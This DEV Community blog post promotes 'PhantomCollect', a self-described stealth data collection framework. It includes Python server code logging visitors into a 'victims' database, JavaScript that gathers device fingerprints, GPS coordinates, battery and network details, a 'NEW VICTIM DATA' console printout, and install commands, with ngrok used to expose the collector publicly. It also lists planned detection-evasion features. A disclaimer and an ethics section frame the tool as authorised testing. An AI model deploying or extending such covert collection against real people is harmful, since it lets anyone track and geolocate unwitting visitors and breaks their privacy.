DEV Community

Cover image for ๐Ÿ›ก๏ธ Advanced Web Data Collection: Building PhantomCollect for Security Research
xsser01
xsser01

Posted on

๐Ÿ›ก๏ธ Advanced Web Data Collection: Building PhantomCollect for Security Research

๐Ÿ” Introduction

In the realm of cybersecurity, understanding what data web applications can collect is crucial for both attackers and defenders. Today, we're diving deep into PhantomCollect - an advanced stealth data collection framework I developed for legitimate security research and penetration testing.

Disclaimer: This tool is for educational purposes and authorized security testing only. Users are solely responsible for complying with all applicable laws.

๐Ÿ—๏ธ Architectural Overview

PhantomCollect employs a sophisticated client-server architecture that demonstrates the extensive data exposure possibilities in modern web browsers.

Server-Side Python Implementation

from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import datetime
import sqlite3
import os

class SimpleDataHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        if self.path == '/':
            self.serve_html()
        else:
            self.send_error(404)

    def do_POST(self):
        if self.path == '/api/collect':
            self.handle_data_collection()
        else:
            self.send_error(404)
Enter fullscreen mode Exit fullscreen mode

The Python backend serves dual purposes:

ยท Web Interface: Delivers the data collection page
ยท API Endpoint: Processes and stores collected data

Multi-Layer Storage System

def save_to_db(self, data):
    conn = sqlite3.connect('victims.db')
    c = conn.cursor()

    c.execute('''INSERT INTO victims 
                (timestamp, ip, user_agent, location, device_info, all_data) 
                VALUES (?, ?, ?, ?, ?, ?)''',
             (data['timestamp'],
              data['collectedData'].get('publicIP', 'Unknown'),
              data['collectedData']['basicInfo']['userAgent'],
              self.extract_location(data),
              self.extract_device_info(data),
              json.dumps(data, indent=2)))

    conn.commit()
    conn.close()
Enter fullscreen mode Exit fullscreen mode

๐ŸŽฏ The 10-Layer Data Collection Engine

The JavaScript frontend implements comprehensive data gathering across multiple dimensions:

  1. Basic Device Fingerprinting
allData.collectedData.basicInfo = {
    userAgent: navigator.userAgent,
    platform: navigator.platform,
    vendor: navigator.vendor,
    language: navigator.language,
    languages: navigator.languages
};
Enter fullscreen mode Exit fullscreen mode
  1. Advanced Hardware Profiling
allData.collectedData.hardwareInfo = {
    hardwareConcurrency: navigator.hardwareConcurrency,  // CPU cores
    deviceMemory: navigator.deviceMemory,                // RAM in GB
    maxTouchPoints: navigator.maxTouchPoints            // Touch capability
};
Enter fullscreen mode Exit fullscreen mode
  1. Precise Geolocation Tracking
allData.collectedData.gpsLocation = {
    latitude: position.coords.latitude,
    longitude: position.coords.longitude,
    accuracy: position.coords.accuracy,     // Accuracy in meters
    altitude: position.coords.altitude,
    speed: position.coords.speed           // Movement speed
};
Enter fullscreen mode Exit fullscreen mode
  1. Network Intelligence
allData.collectedData.networkInfo = {
    effectiveType: navigator.connection.effectiveType,  // 4g, 3g, etc.
    downlink: navigator.connection.downlink,            // Bandwidth
    rtt: navigator.connection.rtt                       // Latency
};
Enter fullscreen mode Exit fullscreen mode
  1. Power Management Insights
allData.collectedData.batteryInfo = {
    charging: battery.charging,
    level: Math.round(battery.level * 100),     // Battery percentage
    chargingTime: battery.chargingTime,
    dischargingTime: battery.dischargingTime
};
Enter fullscreen mode Exit fullscreen mode

๐Ÿ“Š Real-Time Data Visualization

One of PhantomCollect's powerful features is its real-time terminal display:

def print_victim_info(self, data):
    print(f"\n{'๐ŸŽฏ'*20} NEW VICTIM DATA {'๐ŸŽฏ'*20}")
    print(f"๐Ÿ•’ Time: {data['timestamp']}")

    ip = data['collectedData'].get('publicIP', 'Unknown')
    print(f"๐ŸŒ IP: {ip}")

    # Location intelligence
    if 'ipGeoInfo' in data['collectedData']:
        geo = data['collectedData']['ipGeoInfo']
        print(f"๐Ÿ“ Location: {geo.get('city', 'Unknown')}, {geo.get('country', 'Unknown')}")
        print(f"๐Ÿข ISP: {geo.get('isp', 'Unknown')}")

    # Device capabilities
    basic = data['collectedData']['basicInfo']
    screen = data['collectedData']['screenInfo']
    print(f"๐Ÿ“ฑ Platform: {basic['platform']}")
    print(f"๐Ÿ–ฅ๏ธ Screen: {screen['width']}x{screen['height']}")
Enter fullscreen mode Exit fullscreen mode

Sample Terminal Output:

๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ NEW VICTIM DATA ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ๐ŸŽฏ
๐Ÿ•’ Time: 2024-01-15T10:30:00.000Z
๐ŸŒ IP: 192.168.1.100
๐Ÿ“ Location: New York, United States
๐Ÿข ISP: Comcast Cable
๐Ÿ“ฑ Platform: Win32
๐Ÿ–ฅ๏ธ Screen: 1920x1080
๐Ÿ”‹ Battery: 85%
๐Ÿ“ก Network: 4g
๐Ÿ’พ Memory: 8GB
โšก Cores: 8
Enter fullscreen mode Exit fullscreen mode

๐Ÿ›ก๏ธ Security Applications

Penetration Testing

PhantomCollect helps security professionals:

ยท Test data leakage in web applications
ยท Demonstrate privacy risks to stakeholders
ยท Train employees on digital footprint awareness

Security Research

ยท Browser fingerprinting analysis
ยท Privacy vulnerability assessment
ยท Incident response simulation

โš–๏ธ Ethical Considerations

When developing and using such tools, consider:

  1. Authorization: Only use on systems you own or have explicit permission to test
  2. Transparency: Clearly notify users about data collection
  3. Data Handling: Securely store and properly dispose of collected data
  4. Legal Compliance: Adhere to GDPR, CCPA, and other privacy regulations

๐Ÿš€ Getting Started

Installation

pip install phantomcollect
Enter fullscreen mode Exit fullscreen mode

Basic Usage

phantomcollect
# Access: http://localhost:8080
Enter fullscreen mode Exit fullscreen mode

Advanced Deployment

# Make it publicly accessible
phantomcollect & ngrok http 8080
Enter fullscreen mode Exit fullscreen mode

๐Ÿ’ก Key Technical Insights

During development, several important findings emerged:

  1. Modern browsers expose significantly more data than most users realize
  2. Combining multiple data points creates unique device fingerprints
  3. Stealth techniques are essential for realistic security testing
  4. Proper data sanitization is crucial when handling sensitive information

๐Ÿ”ฎ Future Enhancements

Planned features for PhantomCollect:

ยท Tor network integration for anonymous testing
ยท Advanced evasion techniques to bypass detection
ยท Machine learning analysis of collected data patterns
ยท Comprehensive reporting dashboard

๐ŸŽฏ Conclusion

PhantomCollect demonstrates the extensive data exposure capabilities of modern web technologies. For security professionals, understanding these vectors is essential for building more secure applications and educating users about digital privacy.

The tool serves as both an educational resource and a practical security testing framework, emphasizing the importance of ethical development and responsible disclosure in cybersecurity research.

Remember: With great power comes great responsibility. Always use such tools ethically and legally.


๐Ÿ”— Resources & Official Channels

๐Ÿ“ฆ Primary Sources & Distribution

ยท Codeberg (Main Repository): https://codeberg.org/xsser01/phantomcollect
ยท PyPI Package: https://pypi.org/project/phantomcollect/
ยท Arch Linux AUR: https://aur.archlinux.org/packages/phantomcollect
ยท Arch Linux Wiki: https://wiki.archlinux.org/title/User:Xsser01/Phantomcollect

๐ŸŒ Featured On & Community Presence

ยท SourceForge: https://sourceforge.net/projects/phantomcollect/
ยท AlternativeTo: https://alternativeto.net/software/phantomcollect/about/
ยท LibHunt: https://www.libhunt.com/r/phantomcollect
ยท Launchpad: https://launchpad.net/phantomcollect
ยท StackShare: https://stackshare.io/xsser01/phantomcollect

Top comments (0)